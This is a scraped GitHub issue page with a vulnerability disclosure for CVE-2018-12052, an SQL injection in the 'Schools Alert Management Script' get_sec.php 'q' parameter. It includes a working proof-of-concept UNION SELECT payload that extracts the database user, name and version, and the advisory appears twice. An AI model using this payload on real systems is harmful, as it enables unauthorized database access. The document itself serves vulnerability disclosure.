We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Date: 07.06.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ Category: Web Application Exploit Author: xiaotian.wang From DBAppSecurity Tested on: Linux Mint CVE: CVE-2018-12052
get_sec.php?q=[sqli]
/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23
The text was updated successfully, but these errors were encountered:
hello,Do you still have the source code? The code in the repo has been deleted.
Sorry, something went wrong.
No branches or pull requests
=================
Schools Alert Management Script - get_sec.php SQL Injection
Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12052
=================
Vulnerable cgi:
get_sec.php?q=[sqli]
=================
Proof of Concept:
/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23
The text was updated successfully, but these errors were encountered: